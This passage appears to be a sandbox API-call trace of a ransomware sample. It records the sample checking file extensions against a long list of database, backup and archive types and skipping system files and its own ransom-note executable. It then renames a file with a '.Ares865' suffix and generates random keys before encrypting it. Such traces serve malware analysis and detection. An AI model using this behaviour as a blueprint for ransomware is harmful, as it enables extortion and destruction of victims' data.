(lpString1="bmp", lpString2="hdb") returned -1 [0085.044] lstrlenW (lpString="his") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.044] lstrlenW (lpString="ib") returned 2 [0085.044] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.044] lstrlenW (lpString="idb") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.044] lstrlenW (lpString="ihx") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.044] lstrlenW (lpString="itdb") returned 4 [0085.044] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.044] lstrlenW (lpString="itw") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.044] lstrlenW (lpString="jet") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.044] lstrlenW (lpString="jtx") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.044] lstrlenW (lpString="kdb") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.044] lstrlenW (lpString="kexi") returned 4 [0085.044] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.044] lstrlenW (lpString="kexic") returned 5 [0085.044] lstrcmpiW (lpString1="8.bmp", lpString2="kexic") returned -1 [0085.044] lstrlenW (lpString="kexis") returned 5 [0085.044] lstrcmpiW (lpString1="8.bmp", lpString2="kexis") returned -1 [0085.044] lstrlenW (lpString="lgc") returned 3 [0085.044] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.045] lstrlenW (lpString="lwx") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.045] lstrlenW (lpString="maf") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.045] lstrlenW (lpString="maq") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.045] lstrlenW (lpString="mar") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.045] lstrlenW (lpString="marshal") returned 7 [0085.045] lstrcmpiW (lpString1="e28.bmp", lpString2="marshal") returned -1 [0085.045] lstrlenW (lpString="mas") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.045] lstrlenW (lpString="mav") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.045] lstrlenW (lpString="maw") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.045] lstrlenW (lpString="mdbhtml") returned 7 [0085.045] lstrcmpiW (lpString1="e28.bmp", lpString2="mdbhtml") returned -1 [0085.045] lstrlenW (lpString="mdn") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.045] lstrlenW (lpString="mdt") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.045] lstrlenW (lpString="mfd") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.045] lstrlenW (lpString="mpd") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.045] lstrlenW (lpString="mrg") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.045] lstrlenW (lpString="mud") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.045] lstrlenW (lpString="mwb") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.045] lstrlenW (lpString="myd") returned 3 [0085.045] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.045] lstrlenW (lpString="ndf") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.046] lstrlenW (lpString="nnt") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.046] lstrlenW (lpString="nrmlib") returned 6 [0085.046] lstrcmpiW (lpString1="28.bmp", lpString2="nrmlib") returned -1 [0085.046] lstrlenW (lpString="ns2") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.046] lstrlenW (lpString="ns3") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.046] lstrlenW (lpString="ns4") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.046] lstrlenW (lpString="nsf") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.046] lstrlenW (lpString="nv") returned 2 [0085.046] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.046] lstrlenW (lpString="nv2") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.046] lstrlenW (lpString="nwdb") returned 4 [0085.046] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.046] lstrlenW (lpString="nyf") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.046] lstrlenW (lpString="odb") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.046] lstrlenW (lpString="odb") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.046] lstrlenW (lpString="oqy") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.046] lstrlenW (lpString="ora") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.046] lstrlenW (lpString="orx") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.046] lstrlenW (lpString="owc") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.046] lstrlenW (lpString="p96") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.046] lstrlenW (lpString="p97") returned 3 [0085.046] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.046] lstrlenW (lpString="pan") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.047] lstrlenW (lpString="pdb") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.047] lstrlenW (lpString="pdm") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.047] lstrlenW (lpString="pnz") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.047] lstrlenW (lpString="qry") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.047] lstrlenW (lpString="qvd") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.047] lstrlenW (lpString="rbf") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.047] lstrlenW (lpString="rctd") returned 4 [0085.047] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.047] lstrlenW (lpString="rod") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.047] lstrlenW (lpString="rodx") returned 4 [0085.047] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.047] lstrlenW (lpString="rpd") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.047] lstrlenW (lpString="rsd") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.047] lstrlenW (lpString="sas7bdat") returned 8 [0085.047] lstrcmpiW (lpString1="le28.bmp", lpString2="sas7bdat") returned -1 [0085.047] lstrlenW (lpString="sbf") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.047] lstrlenW (lpString="scx") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.047] lstrlenW (lpString="sdb") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.047] lstrlenW (lpString="sdc") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.047] lstrlenW (lpString="sdf") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.047] lstrlenW (lpString="sis") returned 3 [0085.047] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.048] lstrlenW (lpString="spq") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.048] lstrlenW (lpString="te") returned 2 [0085.048] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.048] lstrlenW (lpString="teacher") returned 7 [0085.048] lstrcmpiW (lpString1="e28.bmp", lpString2="teacher") returned -1 [0085.048] lstrlenW (lpString="tmd") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.048] lstrlenW (lpString="tps") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.048] lstrlenW (lpString="trc") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.048] lstrlenW (lpString="trc") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.048] lstrlenW (lpString="trm") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.048] lstrlenW (lpString="udb") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.048] lstrlenW (lpString="udl") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.048] lstrlenW (lpString="usr") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.048] lstrlenW (lpString="v12") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.048] lstrlenW (lpString="vis") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.048] lstrlenW (lpString="vpd") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.048] lstrlenW (lpString="vvv") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.048] lstrlenW (lpString="wdb") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.048] lstrlenW (lpString="wmdb") returned 4 [0085.048] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.048] lstrlenW (lpString="wrk") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.048] lstrlenW (lpString="xdb") returned 3 [0085.048] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.049] lstrlenW (lpString="xld") returned 3 [0085.049] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.049] lstrlenW (lpString="xmlff") returned 5 [0085.049] lstrcmpiW (lpString1="8.bmp", lpString2="xmlff") returned -1 [0085.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.Ares865") returned 90 [0085.049] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.ares865"), dwFlags=0x1) returned 1 [0085.049] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.050] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.051] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.051] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.051] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.054] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.066] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.070] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.070] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.070] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.073] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.074] CloseHandle (hObject=0x15c) returned 1 [0085.074] CloseHandle (hObject=0x118) returned 1 [0085.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.076] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="aoldtz.exe") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="..") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="windows") returned -1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="bootmgr") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="temp") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="pagefile.sys") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="boot") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="ids.txt") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="ntuser.dat") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="perflogs") returned 1 [0085.078] lstrcmpiW (lpString1="usertile29.bmp", lpString2="MSBuild") returned 1 [0085.079] lstrlenW (lpString="usertile29.bmp") returned 14 [0085.079] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 82 [0085.079] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile29.bmp" | out: lpString1="usertile29.bmp") returned="usertile29.bmp" [0085.079] lstrlenW (lpString="usertile29.bmp") returned 14 [0085.079] lstrlenW (lpString="Ares865") returned 7 [0085.079] lstrcmpiW (lpString1="e29.bmp", lpString2="Ares865") returned 1 [0085.079] lstrlenW (lpString=".dll") returned 4 [0085.079] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".dll") returned 1 [0085.079] lstrlenW (lpString=".lnk") returned 4 [0085.079] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".lnk") returned 1 [0085.079] lstrlenW (lpString=".ini") returned 4 [0085.079] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".ini") returned 1 [0085.079] lstrlenW (lpString=".sys") returned 4 [0085.079] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".sys") returned 1 [0085.079] lstrlenW (lpString="usertile29.bmp") returned 14 [0085.080] lstrlenW (lpString="bak") returned 3 [0085.080] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.081] lstrlenW (lpString="ba_") returned 3 [0085.081] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.081] lstrlenW (lpString="dbb") returned 3 [0085.081] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.081] lstrlenW (lpString="vmdk") returned 4 [0085.081] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.081] lstrlenW (lpString="rar") returned 3 [0085.081] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.081] lstrlenW (lpString="zip") returned 3 [0085.081] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.081] lstrlenW (lpString="tgz") returned 3 [0085.081] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.081] lstrlenW (lpString="vbox") returned 4 [0085.081] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.082] lstrlenW (lpString="vdi") returned 3 [0085.083] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.084] lstrlenW (lpString="vhd") returned 3 [0085.084] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.084] lstrlenW (lpString="vhdx") returned 4 [0085.084] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.084] lstrlenW (lpString="avhd") returned 4 [0085.084] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.084] lstrlenW (lpString="db") returned 2 [0085.084] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.084] lstrlenW (lpString="db2") returned 3 [0085.084] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.084] lstrlenW (lpString="db3") returned 3 [0085.084] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.086] lstrlenW (lpString="dbf") returned 3 [0085.087] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.087] lstrlenW (lpString="mdf") returned 3 [0085.087] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.088] lstrlenW (lpString="mdb") returned 3 [0085.088] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.088] lstrlenW (lpString="sql") returned 3 [0085.088] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.088] lstrlenW (lpString="sqlite") returned 6 [0085.088] lstrcmpiW (lpString1="29.bmp", lpString2="sqlite") returned -1 [0085.088] lstrlenW (lpString="sqlite3") returned 7 [0085.088] lstrcmpiW (lpString1="e29.bmp", lpString2="sqlite3") returned -1 [0085.088] lstrlenW (lpString="sqlitedb") returned 8 [0085.088] lstrcmpiW (lpString1="le29.bmp", lpString2="sqlitedb") returned -1 [0085.088] lstrlenW (lpString="xml") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.089] lstrlenW (lpString="$er") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.089] lstrlenW (lpString="4dd") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.089] lstrlenW (lpString="4dl") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.089] lstrlenW (lpString="^^^") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.089] lstrlenW (lpString="abs") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.089] lstrlenW (lpString="abx") returned 3 [0085.089] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.089] lstrlenW (lpString="accdb") returned 5 [0085.089] lstrcmpiW (lpString1="9.bmp", lpString2="accdb") returned -1 [0085.089] lstrlenW (lpString="accdc") returned 5 [0085.090] lstrcmpiW (lpString1="9.bmp", lpString2="accdc") returned -1 [0085.090] lstrlenW (lpString="accde") returned 5 [0085.090] lstrcmpiW (lpString1="9.bmp", lpString2="accde") returned -1 [0085.090] lstrlenW (lpString="accdr") returned 5 [0085.092] lstrcmpiW (lpString1="9.bmp", lpString2="accdr") returned -1 [0085.092] lstrlenW (lpString="accdt") returned 5 [0085.092] lstrcmpiW (lpString1="9.bmp", lpString2="accdt") returned -1 [0085.092] lstrlenW (lpString="accdw") returned 5 [0085.092] lstrcmpiW (lpString1="9.bmp", lpString2="accdw") returned -1 [0085.092] lstrlenW (lpString="accft") returned 5 [0085.092] lstrcmpiW (lpString1="9.bmp", lpString2="accft") returned -1 [0085.092] lstrlenW (lpString="adb") returned 3 [0085.092] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.092] lstrlenW (lpString="adb") returned 3 [0085.093] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.093] lstrlenW (lpString="ade") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.094] lstrlenW (lpString="adf") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.094] lstrlenW (lpString="adn") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.094] lstrlenW (lpString="adp") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.094] lstrlenW (lpString="alf") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.094] lstrlenW (lpString="ask") returned 3 [0085.094] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.094] lstrlenW (lpString="btr") returned 3 [0085.095] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.095] lstrlenW (lpString="cat") returned 3 [0085.095] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.095] lstrlenW (lpString="cdb") returned 3 [0085.095] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.096] lstrlenW (lpString="ckp") returned 3 [0085.096] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.096] lstrlenW (lpString="cma") returned 3 [0085.096] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.096] lstrlenW (lpString="cpd") returned 3 [0085.097] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.097] lstrlenW (lpString="dacpac") returned 6 [0085.097] lstrcmpiW (lpString1="29.bmp", lpString2="dacpac") returned -1 [0085.097] lstrlenW (lpString="dad") returned 3 [0085.097] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.097] lstrlenW (lpString="dadiagrams") returned 10 [0085.098] lstrcmpiW (lpString1="tile29.bmp", lpString2="dadiagrams") returned 1 [0085.098] lstrlenW (lpString="daschema") returned 8 [0085.100] lstrcmpiW (lpString1="le29.bmp", lpString2="daschema") returned 1 [0085.101] lstrlenW (lpString="db-journal") returned 10 [0085.102] lstrcmpiW (lpString1="tile29.bmp", lpString2="db-journal") returned 1 [0085.104] lstrlenW (lpString="db-shm") returned 6 [0085.104] lstrcmpiW (lpString1="29.bmp", lpString2="db-shm") returned -1 [0085.104] lstrlenW (lpString="db-wal") returned 6 [0085.104] lstrcmpiW (lpString1="29.bmp", lpString2="db-wal") returned -1 [0085.104] lstrlenW (lpString="dbc") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.104] lstrlenW (lpString="dbs") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.104] lstrlenW (lpString="dbt") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.104] lstrlenW (lpString="dbv") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.104] lstrlenW (lpString="dbx") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.104] lstrlenW (lpString="dcb") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.104] lstrlenW (lpString="dct") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.104] lstrlenW (lpString="dcx") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.104] lstrlenW (lpString="ddl") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.104] lstrlenW (lpString="dlis") returned 4 [0085.104] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.104] lstrlenW (lpString="dp1") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.104] lstrlenW (lpString="dqy") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.104] lstrlenW (lpString="dsk") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.104] lstrlenW (lpString="dsn") returned 3 [0085.104] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.104] lstrlenW (lpString="dtsx") returned 4 [0085.104] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.104] lstrlenW (lpString="dxl") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.105] lstrlenW (lpString="eco") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.105] lstrlenW (lpString="ecx") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.105] lstrlenW (lpString="edb") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.105] lstrlenW (lpString="epim") returned 4 [0085.105] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.105] lstrlenW (lpString="fcd") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.105] lstrlenW (lpString="fdb") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.105] lstrlenW (lpString="fic") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.105] lstrlenW (lpString="flexolibrary") returned 12 [0085.105] lstrcmpiW (lpString1="ertile29.bmp", lpString2="flexolibrary") returned -1 [0085.105] lstrlenW (lpString="fm5") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.105] lstrlenW (lpString="fmp") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.105] lstrlenW (lpString="fmp12") returned 5 [0085.105] lstrcmpiW (lpString1="9.bmp", lpString2="fmp12") returned -1 [0085.105] lstrlenW (lpString="fmpsl") returned 5 [0085.105] lstrcmpiW (lpString1="9.bmp", lpString2="fmpsl") returned -1 